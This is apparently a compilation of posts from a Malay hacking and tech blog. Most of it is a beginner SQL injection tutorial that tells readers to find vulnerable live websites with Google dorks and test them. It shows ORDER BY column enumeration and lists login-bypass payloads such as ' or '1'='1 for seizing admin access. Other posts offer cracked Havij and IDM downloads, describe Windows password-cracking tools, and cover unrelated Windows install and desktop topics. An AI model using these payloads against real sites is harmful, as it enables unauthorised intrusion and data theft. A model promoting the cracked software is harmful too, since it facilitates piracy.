Untuk intro, janjang harap korang dapat paham sedikit sebanyak macam mane nak tau laman sesawang itu boleh di suntik atau tidak pada siri 1 yang lepas. Untuk siri dua ini, janjang fokus pula cara macam mana nak cari column yang boleh diceroboh pada database untuk dapatkan maklumat setelah kita tahu yang laman tersebut boleh disuntik.
Kali ini, seperti yang dijanjikan kita boleh try pada live website. Harap takde orang yang akan deface laman ni. Untuk kebaikan bersama.
Janjang tau ramai yang tak sabar, jom kita mulakan siri dua ni… Jeng jeng jeng…
Mendapatkan Data
– Dibahagian ini akan diterangkan secara lalu bagaimana mendapatkan Data melalui query ( suntikan / injection ). Sila pahamkan konsep ini.
– Setelah kita mendapati sesuatu laman mempunyai kelemahan untuk sql injection , anda perlu mendapatkan maklumat jumlah table dan column bagi sesuatu database sebelum data dapat diperolehi daripadanya.
– Dengan menggunakan arahan ORDER BY akan memberikan maklumat tersebut.
– Anda harus meneka jumlah column dengan perhatikan error yang muncul. Jika belum keluar error maka jumlah column masih perlu ditambah, dan kalau keluar error pula sebaliknya.
OK, itu penerangan secara ringkas mengenai konsep dan apa yang akan dilakukan pada siri kedua ini. Mari kita mulakan penerangan seterusnya secara lanjut macam mana ia dilakukan.
Mencari laman untuk di suntik.
Mencari laman yang mudah terdedah kepada SQLi ini sangat mudah, apa yang kita perlukan hanya lah enjin pencari google. Perkara pertama yang kita perlukan adalah mencari menggunakan dork. Disini janjang kongsi senarai dork yang janjang ada.(korang boleh jugak cari sendiri. Rasanya mana2 pon sama, hanya perlu ubah sedikit. Tak pon kongsi jer dork yang korang ada kat ruang komen)
Ambil salah satu dork, dan letakkan inurl: pada awalan dork (kalau takde pada dork tu) kemudian copy dan paste kedalam google. Selepas enter, pilih salah mane2 laman yang diberi oleh google, kemudian klik padanya sebagai pilihan sasaran.
Sebagai contoh, url pilihan kita akan kelihatan seperti ini:
Untuk memastikan yang laman sasaran kita pilih mudah diserang, apa yang kita perlu buat ialah tambah tanda penyingkat atau apostrophe ( ‘ ) diakhir url.
Kemudian tekan enter dan kita akan dapati ia akan mengeluarkan mesej error. Jenis atau mesej error yang keluar tak tentu dan pelbagai.
Laman sasaran akan kelihatan macam ni:
Ini permakna kita dah jumpa laman sasaran yang boleh disuntik. OK lepas tu apa yang perlu kita buat pula ialah untuk dapatkan bilangan column yang ada pada database pada page yang digunakan. Cara yang paling mudah ialah dengan menggunakan perintah ORDER BY diikuti dengan nombor column dan ditambah tanda tolak sebanyak dua kali (–) selepas nombor tadi.
Aha, kita dapat mesej error. Ini bermakna bilanga column adalah 11. Kenapa? Sebab pada 12 kita dapat mesej error tapi pada 11 ia normal, tiada mesej error. Bermakna column 12 tidak wujud.
Ok, tamat sudah siri 2. Kalau nak diikutkan nak je gabung sekali dengan siri 3 sebab siri 3 ni pendek jer, tapi saja nak bagi korang meleleh air lur jer hehe.
Harap korang dah paham konsep dan cara macam mane nak dapatkan bilangan column ni. Kenapa kita kena dapatkan bilangan column ni? Sebab dari bilangan ini lah kita akan dapat column mana yang mudah di ceroboh, lagi banyak column, lagi panjang kita perlu taip pada url untuk mengetahui column mana yang bertuah untuk diceroboh tu. Nak tau macam mana? Tunggu siri tiga nanti.
Cara Memasang (Install) Windows 7 Pada Peranti USB (Pendrive)
Berikut adalah cara pemasangan (Installation) Windows 7 ke dalam peranti USB dengan cara manual. Kebiasaannya fail berformat ISO akan dipasang pada CD/DVD untuk dipasangkan pula pada komputer atau laptop yang digunakan. Tetapi bagi pengguna netbook yang tidak mempunyai ruang untuk cakera CD/DVD, maka kaedah ini boleh digunakan oleh anda.
Benda/bahan yang diperlukan untuk kaedah pemasangan ini ialah:
1. USB Pendrive dengan kapasiti storan 4GB (minimum)
2. DVD Windows 7
3. Komputer yang mempunyai perakam DVD (DVD Burner)
Langkah-langkah pemasangan:
1. Masukkan pendrive anda kepada port USB di komputer (sebelum itu, backup data terlebih dahulu)
2. Buka Command Prompt. Jika anda menggunakan Windows Vista, sila buka/jalankan sebagai ‘Administrator’:
Start -> All Programs -> Accessories -> Klik kanan pada ‘Command Prompt’ dan pilih ‘Run as Administrator’
Atau boleh juga klik pada Start -> Run… -> taipkan cmd
Atau klik pada kekunci keyboard yang berlambang ‘Windows’ dan tekan huruf ‘R’ lalu taipkan cmd
3. Taipkan baris perintah berikut satu demi satu:
DISKPART
LIST DISK
SELECT DISK #
P/S: # Adalah nombor peranti USB anda. Kebiasaannya 0 adalah nombor cakera keras (hard disk) anda. Sila pilih nombor yang mewakili peranti USB anda setelah senarai disk dikeluarkan melalui baris perintah ‘LIST DISK’
4. Kemudian, taipkan pula baris perintah berikut satu demi satu:
CLEAN
CREATE PARTITION PRIMARY
SELECT PARTITION 1
ACTIVE
FORMAT FS=NTFS QUICK
ASSIGN
EXIT
5. Masukkan DVD pemasangan Windows 7 dan lihat pada huruf pemacu/perakam DVD anda, sebagai contoh dalam tutorial ini ialah ‘H’. Setelah itu, taipkan baris perintah berikut:
H: CD BOOT
CD BOOT
BOOTSECT.EXE /NT60 E:
EXIT
P/S: ‘E’ Ialah huruf peranti USB anda. Gantikannya sekiranya ia berbeza.
6. Salin kandungan dalam DVD pemasangan Windows 7 anda ke dalam peranti USB.
7. Selesai.
Apa? Mahu cara yang lebih senang? Jika anda sudah mempunyai fail ISO Windows 7 dan ingin memasangnya ke dalam peranti USB dengan cara yang lebih mudah, anda boleh gunakan Windows 7 USB/DVD Download Tool, iaitu tool rasmi untuk memasang Windows 7 ke dalam peranti USB dari Microsoft.
Adakah anda sudah membaca entri tentang SQL Injection sebelum ini?
Jika belum, anda perlu membaca dulu mengenainya untuk memperoleh kefahaman.
Sila baca di sini -> Asas SQLi – S1
Sudah baca? Kalau sudah, bagus kerana Mr.Hac mahu memberikan kepada anda perisian Havij 1.15 Pro (Full and Cracked) sebagai koleksi. Havij ialah perisian yang dapat melakukan proses SQL Injection secara automatik. Untuk tutorial SQL Injection, Janjang akan menulis dengan lebih lanjut supaya anda dapat lebih memahami proses dan tatacara kerjanya. Kerana jika anda tidak faham langsung mengenai SQL Injection, maka anda tidak akan dapat menggunakan Havij dengan baik dan menyeluruh. Mahu muat turun Havij 1.15 Pro Full Cracked? Sila klik pada butang di bawah.
Tengahari tadi masa Mr.Hac sedang mengalami kebosanan, lalu Mr.Hac pun cuba membuat satu perkara yang agak menarik.. iaitu Mr.Hac telah membuat satu halaman proksi untuk anda cuba. Ya. Sememangnya ada beberapa masalah dan bugs yang tidak dapat dielakkan seperti ia tidak menyokong laman web yang memerlukan log masuk seperti Gmail, Facebook, dan ia juga tidak boleh memainkan video di Youtube (itu la yang orang nak tengok pun!)
Tetapi apakah faedahnya? faedahnya ialah anda tidak melayari internet dengan IP asal, kerana ia menggunakan IP dari Google dan ia mampu menyembunyikan IP asal anda. Sekurang-kurangnya anda dapat berasa selamat buat sementara waktu dari anasir-anasir luar yang kurang baik. Ok?
Lagipun ini cuma eksperimentasi Mr.Hac yang pertama. Sebarang kekurangan harap dimaafkan.
Mari kita belajar asas SQLi sama- sama. Janjang edit sikit ayat ikut cite rasa sendiri. Banyak nak kena kredit ni. Yela, Janjang pon baru belajar juga, jadi kenalah cari rujukan banyak terutama kepada KenaHack dan beberapa forum komuniti hacker.
SQL Injection ( SQLi Tutorial )
5 perkara yang anda perlu tahu tentang SQLi
– Asas injection
– Mendapatkan Data
– Keluarkan Data
– Kumpul Maklumat
– Kumpul Data
Asas Injection
Mula-mula kita perlu pahamkan atau gambarkan dulu apa yang sebenarnya dan bagaimana SQLi ini dilakukan. Cuba baca ringkasan yang ade dibawah sebelum kita mulakan langkah pertama menggunakan SQLi.
– Cara mudah mengesan laman yang menggunakan sql ialah jika diperhatikan pada URL ( alamat web ) , ianya mempunyai perimeter id= seperti :
http://www.contoh.my/index.php?id=1
“index.php” merupakan nama file dan “id=1” merupakan perimeter bagi sesuatu info pada laman tersebut.
– Didalam SQL ia diperintah dengan menggunakan perintah :
$result = $db -> query (“SELECT * FROM `content` WHERE id=” . $_GET
[‘id’]);
dan kebiasaanya laman akan diperintahkan melalui :
SELECT * FROM `content` WHERE id=1
– Ini akan membolehkannya disuntik ( inject ) pada perimeter id=1 . Contohnya :
http://www.contoh.my/index.php?id=1′
– Maka anda akan perhatikan keluar error seperti :
Fatal error: Call to a member function fetch_row() on a non-object in
/home/sites/contoh.my/public_html/index.php on line 50
– Namunpun begitu , bukan semua laman akan mengeluarkan error jenis ini, jika anda perhatikan perbezaan laman sebelum dan selepas di inject , maka ia berpotensi di inject.
Okaylah, mari kita mulakan langkah pertama untuk SQLi.
Memintas login admin
Mendapatkan kuasa admin dengan cara memintas akaun admin.
Seperti yang semua tahu , jika ingin melakukan SQL injection , semestinya laman tersebut menggunakan Database. Ini kerana melalui injection sql ini adalah untuk mendapatkan maklumat melalui database tersebut.
Kebiasaannya site yang berpotensi adalah yang berformat *.asp dan *.php.
Mula-mula sekali, kita perlu cari laman sasaran.
Cara yang biasa digunakan untuk mendapatkan sasaran ialah menggunakan google dork. Apakah Dork? Sila klik untuk lihat post sebelum ini.
Kalau nak diikutkan senarai google dork ni terlalu besar bagi kegunaan asas SQLi. Bagaimanapon ini yang paling mudah dan terbaik;
Sekarang ape yang kite perlu buat setelah dapat sasaran?
Sasaran akan memberi kandungan paparan seperti ini:
ADMIN USERNAME :
PASSWORD :
jadi ape yang perlu kita buat adalah biasanya kita akan taip “Admin” pada ruang username. Dan pada ruang password kita akan taip SQLi kita.
Ini senarai SQLi:
‘ or ‘1’=’1
‘ or ‘1’=’1
‘ or ‘x’=’x
‘ or 0=0 —
” or 0=0 —
or 0=0 —
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’=’x
” or “x”=”x
‘) or (‘x’=’x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’=’a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 —
hi’ or 1=1 —
‘or’1=1’
Jadi apa yang perlu anda taip adalah seperti ini.
username:Admin
password:’or’1’=’1
ini akan buat system sql pada sasaran menjadi bingung dan akan memerikan akan kuasa penuh keatas website sasaran kepada anda sebagai admin.
Jika website sasaran anda lemah dan mudah terjejas, anda akan dapat kuasa penuh admin padanya.
Kita sambung lagi dalam siri seterusnya nanti. Cuba pahamkan konsep sqli ni.
Untuk siri akan datang, insyaAllah Janjang akan selitkan beberapa screenshot untuk rujukan anda.
Dah lama rasanya tak post kaedah untuk mengubah/menggodam kata laluan pentadbir Windows (hack Windows Administrator password). Sebelum ini Mr.Hac pernah buat post pasal kaedah atau cara untuk hack Windows Administrator password (secara manual). Namun untuk hari ini, Mr.Hac memperkenalkan kepada anda beberapa tools yang dapat membantu anda untuk mengubah kata laluan, mengubah status akaun pengguna dan lain-lain lagi.
Didatangkan dalam bentuk exe dan apabila anda mengekstrakkannya, akan kelihatan fail berformat ISO. Fail ini perlu dirakam (burn) ke dalam CD atau Peranti USB mudah alih sebelum dapat digunakan. Ia bertindak/berfungsi secara offline. Ianya mempunyai Graphical User Interface (GUI) yang menarik dan mudah difahami dan yang paling penting, ia PERCUMA.
(Thanks to bro Dgodam for introducing me with this awesome tool. Where are you right now bro??)
Ini adalah satu daripada tool alternatif kepada PC Login Now. Kerana Mr.Hac penah cuba PC Login Now, ada beberapa komputer yang tidak dapat diubah kata laluannya atas sebab masalah yang tidak dapat dielakkan. Rujuk -> PC Login Now Trouble
Ia tidak mempunyai GUI dan hanya dalam bentuk teks (baris perintah). Mungkin ini tidak begitu menyenangkan bagi para pemula tetapi kalau anda rajin belajar, ia sebenarnya agak mudah.
Mampu mengubah kata laluan mana-mana pengguna pada mana-mana akaun, mampu membuat akaun baru dengan status sebagai Administrator, boleh menukar status akaun biasa yang sedia ada kepada Administrator, dan lain-lain lagi. Mempunyai GUI yang ringkas tetapi mudah difahami.
GUI sederhana dengan pelbagai fungsi, mudah digunakan dan boleh dipasang pada pelbagai sistem operasi (Multi OS Support). Berfungsi secara offline dan boleh melakukan apa yang anda mahu, iaitu mengubah kata laluan yang anda terlupa. Ia boleh dijadikan sebagai alternatif kepada PC Login Now dan Offline NT Password & Registry Editor sekiranya kedua-dua tool tadi tidak berkesan.
Pwdump juga bertindak tanpa GUI yang menarik, hanya berbentuk baris perintah. Perlu digunakan bersama John the Ripper untuk memecahkan kod hash yang dihasilkan. Tidak begitu mudah untuk pemula, oleh itu anda perlu banyak mengkaji cara menggunakannyaa terlebih dahulu.
Seperti biasa, IDM mengemaskini versi perisiannya kepada yang terbaru iaitu IDM 6.07 Build 7. Jika anda adalah pembaca tetap blog ini, anda pasti tahu Mr.Hac adalah peminat perisian IDM ini. Ok.. Sila lihat gambar di bawah untuk mengetahui fungsi terbaharunya.
Nota: IDM Mr.Hac berwarna biru kerana ia selari dengan tema perisian TuneUp Utilities
Dari laman web IDM:
What’s new in version 6.07 build 7?
(Released: Aug 01, 2011)
Enhanced “Speed Limiter”. Added the feature to set an individual limit for every download
Redesigned “Download progress” dialog, added new tabs and the possibility to disable tabs that are not necessary for you
Fixed bugs
IDM Mr.Hac yang sudah crack
Klik pada butang di bawah untuk muat turun:
Jadilah orang pertama yang mencubanya!
Kalau anda tidak tahu cara untuk crack IDM, sila rujuk entri Mr.Hac yang terdahulu di sini -> Cara Crack IDM
Salam ramadhan semua… Disebabkan janjang nak hilangkan ngantuk, janjang buat2 bz depan bos janjang. dan terhasil lah entri pendek ni. kalau ade yang rase entri ni tak betul boleh bgtau yer.
Ok la, sebelum mulakan entri untuk asas SQLi (SQL injection), ade baiknyer janjang mulakan dengan pengenalan apakah itu Google Dork. istilah ni selalu hacker guna bagi mencari target untuk SQLi. kalau nak diterangkan menggunakan bahasa janjang tak tau nak terangkan macam mane apekah google dork tu. mane2 janjang cari pon biasa nyer orang akan list dork jer. Cuma apa yang janjang paham ianya berfungsi untuk mendapatkan page unik untuk kita lakukan SQLi dan menyokong SQL. Jadi, bagi nak terangkan ape itu google dork, janjang terjumpe la gambar bergerak. mungkin boleh bagi gambaran kepada semua ape itu google dork.
dan byk lagi la.. kalau nak list semua jadi panjang sangat pulak, nanti tak jadi la entri pendek.
*kebanyakkan website yg lemah telah di hack menggunakan dork2 asas ni. maksudnyer susah la kita sebagai pemula nak main2 dengan dork ni. tapi masih ade lagi website, kalau bernasib baik korang akan jumpe untuk di hack.
boleh la cuba dork2 kat bawah ni untuk tgk ape yg google boleh bagi.
Windows 7 Service Pack 1 ISO Official Direct Download Links
Akhirnya setelah beberapa lama Windows 7 berada di arena persaingan industri sistem operasi, buat kesekian kalinya Mr.Hac dapat pautan kepada muat turun pemasang (installer) Windows 7 Service Pack 1 berformat ISO (Official Direct Download Links) dari sebuah blog sahabat iaitu Eins.my.
Windows 7 Service Pack 1 (SP1) adalah versi kemaskini terbaru dari Microsoft untuk para pengguna Windows 7. Ia membawa lebih banyak penambahbaikan dari segi fungsi dan bugs serta tampalan keselamatan baharu.
(Mr.Hac sengaja menayangkan pautan dengan tujuan optimasi SEO. Harap maklum.)
Jangan bimbang kerana seperti biasa, fail ISO Windows 7 kali ini juga dihoskan dalam pelayan berkelajuan tinggi. Oleh itu meskipun fail tersebut bersaiz besar, namun masa yang diperlukan untuk memuat turun adalah singkat (bergantung kepada kelajuan internet anda juga). Untuk mengetahui dengan lebih lanjut cara merakam (burn) fail Windows berformat ISO ini ke dalam peranti USB anda, sila rujuk entri Mr.Hac yang terdahulu di sini -> Download Official Windows 7 ISO Direct Download Links
Assalamualaikum kepada para pembaca sekalian.
Pernahkah anda lihat persekitaran dekstop (Desktop Environment) seseorang yang begitu menarik perhatian anda? Hari ini Mr.Hac ingin berkongsi serba sedikit tentang cara Mr.Hac menghias persekitaran desktop (Windows 7/XP) yang Mr.Hac gunakan.
Terdapat dua cara untuk menghias persekitaran desktop sama ada anda mahu menggunakan perisian atau cara manual. Cara yang Mr.Hac gunakan adalah kedua-duanya tetapi Mr.Hac minimakan penggunaan RAM supaya prestasi PC tetap kekal terbaik apabila diperlukan.
Jika anda mahu gunakan perisian semata-mata, maka perisian yang boleh Mr.Hac cadangkan ialah Winstep Extreme (versi terbaru ialah 11.6). Namun jika anda mahu keseronokan mencari beberapa perisian yang dapat menyerupai persekitaran desktop Winstep Extreme, berikut Mr.Hac senaraikan beberapa perisian dan keperluan untuk menghias desktop anda:
Rainmeter – Platform untuk pengubahsuaian Desktop
RocketDock – Graphical User Interface (GUI) untuk pelancar aplikasi
7tsp – 7 Theme Source Patcher: Membantu anda mengubah tema Windows dengan mudah
Windows Start Button Changer – Pengubah butang ‘Start Menu’
Beberapa icon untuk melengkapkan hiasan dan beberapa ‘skin’ untuk mengubahsuai Rainmeter
Contoh tampilan persekitaran desktop Mr.Hac
Gambar di atas adalah contoh dari persekitaran desktop Mr.Hac sendiri (tak habis lagi tu, baru lepas format). Mr.Hac meminimakan penggunaan gadjet tetapi menambah beberapa ‘skin’ yang dapat menggantikan default gadjet dari Windows 7. Berikut adalah beberapa perkara yang diubah/ditambah oleh Mr.Hac:
1. Butang ‘Start Menu’
2. HD Wallpaper
3. Dock (Rocket Dock, kerana ia mudah digunakan dan diubahsuai)
4. Rainmeter skin (Apa yang dipasang adalah Arcs-8Core Clock, Kerrigan CPU, Kerrigan RAM)
5. Ikon di taskbar yang telah disusun/dipindah ke tengah
6. Tema (Theme)
7. Ikon pada Rocket Dock yang telah diubah
Apa lagi yang akan diubahsuai/ditambah? buat masa ini Mr.Hac akan mengubah icon pada taskbar kepada warna hitam supaya sepadan dengan tema (Dark Edition). Pada asalnya Mr.Hac memang telah memasang Windows 7 versi ‘Dark Edition’ tetapi Mr.Hac kurang berpuas hati dengannya. Jadi Mr.Hac mengambil keputusan untuk reinstall Windows 7 (Ultimate) dan ubahsuai sendiri tampilannya kepada ‘Dark Edition’ versi Mr.Hac. Selain dari RocketDock, anda juga boleh menggunakan ObjectDock sebagai tambahan (versi percuma disediakan)
Sekiranya anda mahu tutorial, anda boleh rujuk kepada setiap forum perisian yang Mr.hac gunakan.
Pautan untuk memuat turun perisian-perisian tersebut adalah seperti dibawah: